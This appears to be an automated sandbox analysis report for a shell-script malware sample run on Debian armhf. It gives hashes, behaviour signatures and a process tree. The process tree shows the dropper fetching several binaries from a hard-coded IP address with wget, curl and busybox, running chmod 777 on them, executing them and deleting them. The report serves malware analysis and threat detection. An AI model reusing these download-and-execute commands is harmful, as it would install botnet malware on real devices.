Analysis
-
max time kernel
6s -
max time network
7s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 682 chmod 709 chmod 742 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 684 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 710 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 743 ekoIDag2IrendezgvRAX8H4MvHggSiH31v -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:654
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:661
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:679
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:690
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:709
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:722
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:745
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97